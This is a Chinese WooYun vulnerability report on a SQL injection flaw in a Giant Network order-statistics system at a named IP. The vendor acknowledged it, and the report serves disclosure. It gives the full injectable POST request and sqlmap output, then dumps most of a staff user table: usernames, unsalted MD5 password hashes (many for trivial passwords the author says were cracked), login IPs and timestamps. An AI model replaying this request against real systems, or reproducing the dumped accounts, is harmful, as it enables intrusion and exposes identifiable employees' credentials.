当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169054

漏洞标题:巨人网络某系统POST注入漏洞(可影响15万订单安全+400用户)

相关厂商:巨人网络

漏洞作者: 牛 小 帅

提交时间:2016-01-11 11:56

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

是不是要声明转载?
本菜比抄袭大牛漏洞:http://www.wooyun.org/bugs/wooyun-2015-0161906
弱口令造成sql注入

详细说明:

描述已经声明:
注入点都不是同一个,居然说我重复,公开漏洞 我每个都会仔细看,一大堆重复什么svn泄漏啊,什么存在webshell啊,我都醉了
http://222.73.243.217/
查询出存在post注入(看好参数)

TD%[FXSBN]_0K{}[K]VZ3]M.jpg


某大牛参数:

222.73.243.217/syswork/carryon/carryonshow.php?act=manage&carryonid=35468


我的参数是listorder:
Post包在这里

POST /syswork/statistics/order_standard_list.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/statistics/order_standard_list.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2502
__EVENTTARGET=btsearch&__EVENTARGUMENT=%B2%E9%D1%AF&__VIEWSTATE=YToyOntzOjEyOiJvcmRlclR5cGVhcnkiO2E6MTE6e3M6ODoi087Pt87KzOIiO2E6MTA6e2k6MTE0NjM7czoxMjoi087Pt0JVRya2qsqnIjtpOjExNDY0O3M6MTM6ItPOz7ewstewJrj80MIiO2k6MTE0NjU7czoxMzoi087Pt7XHwrwmycHNyyI7aToxMTQ3MjtzOjE5OiLTzs%2B3xNrO78a3L7v1sdK2qsqnIjtpOjExNDczO3M6Nzoi087Pt0JVRyI7aToxMTQ3NDtzOjg6ItPOz7ewstewIjtpOjExNDc1O3M6ODoi087Pt7j80MIiO2k6MTE0NzY7czo4OiLTzs%2B3ycHNyyI7aToxMTQ3NztzOjg6ItPOz7e1x8K9IjtpOjExNDgzO3M6MTQ6Irvutq%2B9scD4zrS78bXDIjt9czoyMDoi087Pt87KzOKjqL7eyMvK1tPOo6kiO2E6NDp7aToxMTQ2ODtzOjI0OiLTzs%2B3QlVHJraqyqejqL7eyMvK1tPOo6kiO2k6MTE0Njk7czoyNToi087Pt7Cy17AmuPzQwqOovt7Iy8rW086jqSI7aToxMTQ3MDtzOjI1OiLTzs%2B3tcfCvSbJwc3Lo6i%2B3sjLytbTzqOpIjtpOjExNDc4O3M6MjA6Is6luea%2B2bGoo6i%2B3sjLytbTzqOpIjt9czoyMDois%2BTWtc7KzOKjqL7eyMvK1tPOo6kiO2E6MTp7aToxMTQ3MTtzOjIyOiKz5Na1zrS1vdXLo6i%2B3sjLytbTzqOpIjt9czoyMDoi1cu6xc7KzOKjqL7eyMvK1tPOo6kiO2E6NDp7aToxMTQ3OTtzOjIwOiLQxc%2Bi1dK72KOovt7Iy8rW086jqSI7aToxMTQ4MjtzOjI3OiK3%2Fs7xxvcmx%2F61wLLp0a%2BjqL7eyMvK1tPOo6kiO2k6MTE0ODU7czozMDoitPPW99TXus%2FH%2BL3Hyau1x7zHo6i%2B3sjLytbTzqOpIjtpOjExNDg3O3M6MjA6ItXLusXG9M2jo6i%2B3sjLytbTzqOpIjt9czoyMDoixuTL%2B87KzOKjqL7eyMvK1tPOo6kiO2E6Mjp7aToxMTQ4MDtzOjI3OiK%2FqsaxyerH6yi49sjLKSCjqL7eyMvK1tPOo6kiO2k6MTE0ODE7czoyNzoiv6rGscnqx%2BsouavLvikgo6i%2B3sjLytbTzqOpIjt9czoxMjoiQVBQLbPk1rXOysziIjthOjE6e2k6MTE0ODQ7czoxMDois%2BTWtc60tb3VyyI7fXM6MjA6Is22y9%2FOyszio6i%2B3sjLytbTzqOpIjthOjE6e2k6MTE0ODY7czoyMDoizbbL37%2FNt%2F6jqL7eyMvK1tPOo6kiO31zOjg6Is22y9%2FOysziIjthOjE6e2k6MTE0ODg7czoxMjoiv823%2FrvYuLS07c7zIjt9czoyMDoixuTL%2B87KzOKjqL7eyMvSxravo6kiO2E6MTp7aToxMTQ4OTtzOjI5OiLV982%2Bv9q0%2FLDmyM%2FWpFZJUKOovt7Iy9LGtq%2BjqSI7fXM6Mjk6ItX3zb6%2F2rT8sObIz9akdmlwo6i%2B3sjLytbTzqOpIjthOjE6e2k6MTE0OTA7czoxOToiyM%2FWpHZpcKOovt7Iy8rW086jqSI7fXM6MTI6IkFQUC3G5Mv7zsrM4iI7YToxOntpOjExNDkxO3M6ODoizqW55r7ZsagiO319czoxMToidG1wT2JqZWN0U1QiO086MTc6Ik9yZGVyU3RhbmRhcmRUaW1lIjoxMTp7czoyMToiAE9yZGVyU3RhbmRhcmRUaW1lAGlkIjtOO3M6MzE6IgBPcmRlclN0YW5kYXJkVGltZQBxdWVzdGlvblR5cGUiO047czoyNjoiAE9yZGVyU3RhbmRhcmRUaW1lAGRlcENvZGUiO047czozMToiAE9yZGVyU3RhbmRhcmRUaW1lAHN0YW5kYXJkVGltZSI7TjtzOjI4OiIAT3JkZXJTdGFuZGFyZFRpbWUAcXVlcnlUeXBlIjtOO3M6Mjg6IgBPcmRlclN0YW5kYXJkVGltZQBpc1dlZWtlbmQiO047czo1OiJtU2l6ZSI7aToxNTtzOjEwOiJtRGF0YVRvdGFsIjtzOjI6IjI4IjtzOjEwOiJtUGFnZVRvdGFsIjtkOjI7czoxMjoibUN1cnJlbnRQYWdlIjtpOjE7czo3OiJtU3FsU3RyIjtzOjUzOiJTRUxFQ1QgKiBGUk9NIGNzX292ZXJ0aW1lX3N0YW5kYXJkICAgb3JkZXIgYnkgaWQgZGVzYyI7fX0%3D&cbkselected=&listOrderType=&listOrderTypeDetail=0&deptCode=1&pageselect=1


[11:48:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:48:41] [INFO] fetching current user
[11:48:41] [INFO] resumed: uYW4Y7N27EDVL@10.240.31.6
current user: 'uYW4Y7N27EDVL@10.240.31.6'


available databases [2]:
[*] information_schema
[*] mobilecsms


[11:47:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:47:34] [INFO] resumed: 149141
Database: mobilecsms
+----------+---------+
| Table | Entries |
+----------+---------+
| cs_order | 149141 |
+----------+---------+


web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:47:19] [INFO] resumed: 390
Database: mobilecsms
+------------+---------+
| Table | Entries |
+------------+---------+
| basic_user | 390 |
+------------+---------+


还有几百用户显示不过来,超过70%用户使用1和123456密码(表示已解密)

| 1      | 2016-01-01 15:28:55 | 180.168.126.117 | 2014-12-25 16:25:16 | NULL
| 2470 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| gwzz | NULL
| 1 | NULL | NULL | 2014-12-25 16:38:35 | NULL
| 2471 | ???? | e10adc3949ba59abbe56e057f20f883e |
| bianjiachao | 1,2,3,4,5,6,7,8,9,10
| 1 | 2016-01-10 20:44:19 | 180.168.126.117 | 2014-12-25 16:57:21 | NULL
| 2472 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| shenyihuan | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-08-20 17:16:15 | 210.13.74.218 | 2014-12-25 17:05:33 | NULL
| 2485 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| shidanrong | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-06-26 17:39:44 | 180.168.126.117 | 2014-12-25 17:22:01 | NULL
| 2486 | ??? | 5ee6ea5bbe1c63fcf3e29df11755a08d |
| sunxiaozhuo | 1,2,3,4,5,6,7,9,8,10
| 1 | NULL | NULL | 2014-12-25 17:06:47 | NULL
| 2487 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| wangjun5 | 1,2,3,4,5,6,7,8,9,10
| 1 | NULL | NULL | 2014-12-25 17:07:23 | NULL
| 2488 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| wangwei2 | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-03-04 09:45:59 | 180.168.126.117 | 2014-12-25 17:08:01 | NULL
| 2489 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| wangyousi | 1,2,3,4,5,6,7,8,9,10
| 1 | 2016-01-11 08:50:29 | 180.168.126.117 | 2014-12-25 17:08:34 | NULL
| 2490 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| yinxiaorong | 1,2,3,4,5,6,7,8,9,10
| 1 | 2016-01-11 08:26:20 | 180.168.126.117 | 2014-12-25 17:09:36 | NULL
| 2492 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| yinying | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-10-10 09:10:57 | 210.13.74.218 | 2014-12-25 17:10:08 | NULL
| 2493 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| yuhongjia | 1,2,3,4,5,6,7,8,9,10
| 1 | NULL | NULL | 2014-12-25 17:10:37 | NULL
| 2494 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| shenwenchao | 1,2,3,4,5,6,7,9,8,10
| 1 | NULL | NULL | 2014-12-25 17:04:47 | NULL
| 2484 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| nilili | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-01-07 15:17:03 | 180.168.126.117 | 2014-12-25 17:04:10 | NULL
| 2483 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| luyunqiang | 1,2,3,4,5,6,7,8,9,10
| 1 | 2016-01-11 09:01:28 | 180.168.126.117 | 2015-02-02 04:47:56 | NULL
| 2482 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| daiyan | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-08-03 17:48:12 | 180.168.126.117 | 2014-12-25 16:58:05 | NULL
| 2473 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| daiying | 1,2,3,4,5,6,7,8,10,9
| 1 | 2015-05-08 16:03:52 | 180.168.126.117 | 2014-12-25 16:58:45 | NULL
| 2474 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| hebin | 1,2,3,4,5,6,7,8,9,10
| 1 | 2016-01-11 01:11:21 | 180.168.126.117 | 2014-12-25 16:59:25 | NULL
| 2475 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| huangchenjie | 1,2,3,4,5,6,7,8,9,10
| 1 | 2014-12-25 17:21:18 | 180.168.126.117 | 2014-12-25 17:21:57 | NULL
| 2476 | ??? | a9409fa2aa61a2317acd433c2b2c1588 |
| huangpengyun | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-01-07 15:04:06 | 180.168.126.117 | 2014-12-25 17:00:35 | NULL
| 2477 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| hubeili | 1,2,3,4,5,6,7,8,10,9
| 1 | 2015-01-07 15:02:49 | 180.168.126.117 | 2014-12-25 17:01:09 | NULL
| 2478 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| lisisi | 1,2,3,4,5,6,7,8,9,10
| 1 | NULL | NULL | 2014-12-25 17:01:46 | NULL
| 2479 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| lizhenwen | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-08-09 12:33:50 | 180.168.126.117 | 2014-12-25 17:02:25 | NULL
| 2480 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| longchuangcheng | 1,2,3,4,5,6,7,8,9,10
| 1 | NULL | NULL | 2014-12-25 17:03:01 | NULL
| 2481 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| zhangbin | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-08-07 11:58:46 | 116.233.22.140 | 2014-12-25 17:11:03 | NULL
| 2495 | ?? | e10adc3949ba59abbe56e057f20f883e |
| yuyifeng | 1,2,3,4,5,6,7
| 1 | 2015-03-08 02:06:31 | 180.168.126.117 | 2015-02-28 00:30:49 | NULL
| 2751 | ??? | e10adc3949ba59abbe56e057f20f883e |
| zhangxu | 1,2,3,4,5,6,7,8,9
| 1 | 2015-07-16 19:49:24 | 180.168.126.117 | 2014-12-24 18:32:44 | NULL
| 2421 | ?? | e10adc3949ba59abbe56e057f20f883e |
| APP | NULL
| 1 | 2015-10-01 22:41:39 | 114.241.58.174 | 2015-09-24 14:37:11 | NULL
| 2815 | APP | e10adc3949ba59abbe56e057f20f883e |
| wangjunhao | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-10-30 16:26:53 | 180.168.126.117 | 2015-10-30 13:26:02 | NULL
| 2818 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| liubocheng | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 10:11:33 | 180.168.126.117 | 2015-11-02 12:07:43 | NULL
| 2819 | ??? | e10adc3949ba59abbe56e057f20f883e |
| shiyi | 11
| 1 | 2015-12-03 11:33:46 | 180.168.126.117 | 2015-09-15 14:27:38 | NULL
| 2810 | ?? | e10adc3949ba59abbe56e057f20f883e |
| yuanbo | NULL
| 1 | NULL | NULL | 2015-09-15 14:28:51 | NULL
| 2811 | ?? | e10adc3949ba59abbe56e057f20f883e |
| chenyanjie | 11
| 1 | 2015-09-16 11:35:10 | 180.168.126.117 | 2015-09-15 14:31:31 | NULL
| 2812 | ??? | e10adc3949ba59abbe56e057f20f883e |
| nanzhenhao | 11
| 1 | NULL | NULL | 2015-09-15 14:33:26 | NULL
| 2813 | ??? | e10adc3949ba59abbe56e057f20f883e |
| zhuyafang | 11
| 1 | 2015-09-24 18:28:24 | 180.168.126.117 | 2015-09-15 14:35:26 | NULL
| 2814 | ??? | e10adc3949ba59abbe56e057f20f883e |
| xudanlei | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 08:46:05 | 180.168.126.117 | 2014-12-24 18:29:41 | NULL
| 2420 | ??? | e10adc3949ba59abbe56e057f20f883e |
| huangguzhen | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 19:13:48 | 180.168.126.117 | 2015-05-12 21:50:01 | NULL
| 2419 | ??? | 92f9c92d38fd87bdaeae685f9be36183 |
| jiangjiuxia | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-07-23 11:35:56 | 180.168.126.117 | 2015-01-28 11:06:25 | NULL
| 2418 | ??? | d7d397605f961601dac08f1e2cce55c8 |
| yangzexiao | 1
| 1 | 2016-01-11 10:48:06 | 101.81.1.176 | 2015-03-03 15:50:21 | NULL
| 2752 | ??? | e10adc3949ba59abbe56e057f20f883e |
| linqi | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-12-22 19:04:45 | 180.168.126.117 | 2015-03-10 07:07:34 | NULL
| 2753 | ?? | e10adc3949ba59abbe56e057f20f883e |
| zhangtingting | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 10:44:54 | 180.168.126.117 | 2015-03-12 13:05:41 | NULL
| 2754 | ??? | e10adc3949ba59abbe56e057f20f883e |
| zhangzhenyue | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 21:04:56 | 180.168.126.117 | 2015-03-20 23:03:12 | NULL
| 2762 | ??? | e10adc3949ba59abbe56e057f20f883e |
| suxiaodi | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 09:03:34 | 180.168.126.117 | 2015-03-16 14:36:34 | NULL
| 2756 | ??? | e10adc3949ba59abbe56e057f20f883e |
| pubichen | 1,2,3,4,5,6,7,8,9
| 1 | 2015-08-15 19:33:34 | 180.168.126.117 | 2015-07-01 18:29:45 | NULL
| 2763 | ??? | e10adc3949ba59abbe56e057f20f883e |
| tangyufei | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-11-26 08:06:12 | 180.168.126.117 | 2013-06-25 16:01:52 | NULL
| 1279 | ??? | c35282eba8a55ebd34f1b47dea23f16f |
| caisai | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 10:02:23 | 223.104.5.226 | 2014-12-25 13:30:46 | NULL
| 2423 | ?? | e10adc3949ba59abbe56e057f20f883e |
| cuijunmiao | 1
| 1 | 2014-12-24 17:54:45 | 210.13.74.218 | 2014-12-24 15:13:26 | NULL
| 2416 | ??? | e10adc3949ba59abbe56e057f20f883e |
| chenweifeng | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-10-14 07:30:49 | 180.168.126.117 | 2015-09-28 16:31:04 | NULL
| 2816 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| kefu360 | NULL
| 1 | NULL | NULL | 2015-12-01 10:35:43 | NULL
| 2825 | kefu360 | 02c9278a6d4f6102485ca95d266b90ca |
| wushuqiong | 11
| 1 | 2016-01-08 18:09:18 | 180.168.126.117 | 2015-11-16 16:09:20 | NULL
| 2820 | ??? | e10adc3949ba59abbe56e057f20f883e |
| lijiang | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-08-24 18:59:44 | 180.168.126.117 | 2014-12-25 13:34:48 | NULL
| 2430 | ?? | e10adc3949ba59abbe56e057f20f883e |
| luodongjie | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 10:56:17 | 180.168.126.117 | 2015-08-05 23:43:49 | NULL
| 2431 | ??? | 57e3aeb7afbbcfefd6307ae30723dc39 |
| mahuiping | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-10-21 10:47:22 | 180.168.126.117 | 2014-12-25 13:36:01 | NULL
| 2432 | ??? | e10adc3949ba59abbe56e057f20f883e |
| renyuanyuan | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-01-13 18:09:49 | 180.168.126.117 | 2014-12-25 13:36:36 | NULL
| 2433 | ??? | e10adc3949ba59abbe56e057f20f883e |
| sunjiaping1 | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-12-14 18:37:02 | 180.168.126.117 | 2014-12-25 13:38:10 | NULL
| 2434 | ??? | e10adc3949ba59abbe56e057f20f883e |
| tangyun | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 08:44:07 | 180.168.126.117 | 2014-12-25 13:39:25 | NULL
| 2435 | ?? | e10adc3949ba59abbe56e057f20f883e |
| wangjunming | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 10:46:33 | 180.168.126.117 | 2014-12-25 13:40:11 | NULL
| 2436 | ??? | e10adc3949ba59abbe56e057f20f883e |
| wangying2 | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-07-06 17:05:16 | 180.168.126.117 | 2014-12-25 13:40:35 | NULL
| 2437 | ?? | e10adc3949ba59abbe56e057f20f883e |
| wangyu2 | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 08:07:34 | 180.168.126.117 | 2014-12-25 13:41:08 | NULL
| 2438 | ?? | e10adc3949ba59abbe56e057f20f883e |
| liangzhihao | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-10 21:03:43 | 180.168.126.117 | 2014-12-25 13:34:00 | NULL
| 2428 | ??? | e10adc3949ba59abbe56e057f20f883e |
| jinbo | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-10-14 09:01:51 | 180.168.126.117 | 2014-12-25 13:33:30 | NULL
| 2427 | ?? | e10adc3949ba59abbe56e057f20f883e |
| gaoying | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-09-06 09:06:04 | 180.168.126.117 | 2014-12-25 13:32:54 | NULL
| 2426 | ?? | e10adc3949ba59abbe56e057f20f883e |
| longjianhui | 8
| 1 | 2015-12-07 18:03:59 | 180.168.126.117 | 2015-11-21 10:34:49 | NULL
| 2821 | ??? | e10adc3949ba59abbe56e057f20f883e |
| chenxueqing | 8
| 1 | 2016-01-07 15:01:11 | 180.168.126.117 | 2015-11-21 10:36:53 | NULL
| 2822 | ??? | e10adc3949ba59abbe56e057f20f883e |
| liucheng | 8
| 1 | 2015-12-30 19:16:47 | 180.168.126.117 | 2015-11-27 11:23:21 | NULL
| 2824 | ?? | e10adc3949ba59abbe56e057f20f883e |
| luoyongkang | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-11 08:58:25 | 180.168.126.117 | 2015-12-09 14:07:12 | NULL
| 2826 | ??? | c4ca4238a0b923820dcc509a6f75849b |
| wujun | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2016-01-05 10:18:44 | 180.168.126.117 | 2015-12-15 09:42:45 | NULL
| 2827 | ?? | c4ca4238a0b923820dcc509a6f75849b |
| zhongxiaowang | NULL
| 1 | 2015-12-16 15:04:26 | 180.168.126.117 | 2015-12-15 11:46:37 | NULL
| 2828 | ??? | e10adc3949ba59abbe56e057f20f883e |
| chenzhangwei | 1,2,3,4,5,6,7,8,9,10
| 1 | 2015-05-18 16:55:23 | 180.168.126.117 | 2013-07-08 18:06:42 | NULL
| 1965 | ??? | c89809a65749ec913d3e0e0651c05f88 |
| zhuangzhenya | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-11-30 00:42:17 | 180.168.126.117 | 2014-12-25 13:27:36 | NULL
| 2422 | ??? | e10adc3949ba59abbe56e057f20f883e |
| changxuhui | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-12-21 10:15:44 | 180.168.126.117 | 2014-12-25 13:32:27 | NULL
| 2425 | ??? | e10adc3949ba59abbe56e057f20f883e |
| wangyunfei | 1,2,3,4,5,6,7,8,9,10,11
| 1 | 2015-12-06 19:26:53 | 180.168.126.117 | 2014-12-25 13:42:12 | NULL
| 2440 | ??? | e10adc3949ba59abbe56e057f20f883e |
+-----------------+-------------------------------------------------------------
--------------------------------------------------------------------------------
-+--------+---------------------+-----------------+---------------------+-------
----+--------+----------+----------------------------------+
[11:20:42] [INFO] Table 'mobilecsms.basic_user' dumped to CSV file 'E:\sqlmap\sq
lmap\Bin\output\222.73.243.217\dump\mobilecsms\basic_user.csv'
[11:20:42] [INFO] Fetched data logged to text files under 'E:\sqlmap\sqlmap\Bin\
output\222.73.243.217'

漏洞证明:

厂商大大 影响很大 订单我就没给你跑出来,不证明一下,审核说我抄袭

修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-11 18:05

厂商回复:

谢谢关注,已通知整改

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-11 11:59 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2981 漏洞数:506 | 刚发现个好洞网站就挂了)

    牛哥威武

  2. 2016-01-11 12:00 | 牛 小 帅 ( 普通白帽子 | Rank:1071 漏洞数:250 | 1.乌云最帅的男人 ...)

    @我的邻居王婆婆 总要公平对吧,最气人的就是冤枉人 本来还想续集的,还有一处注入,懒得提了 心情都没了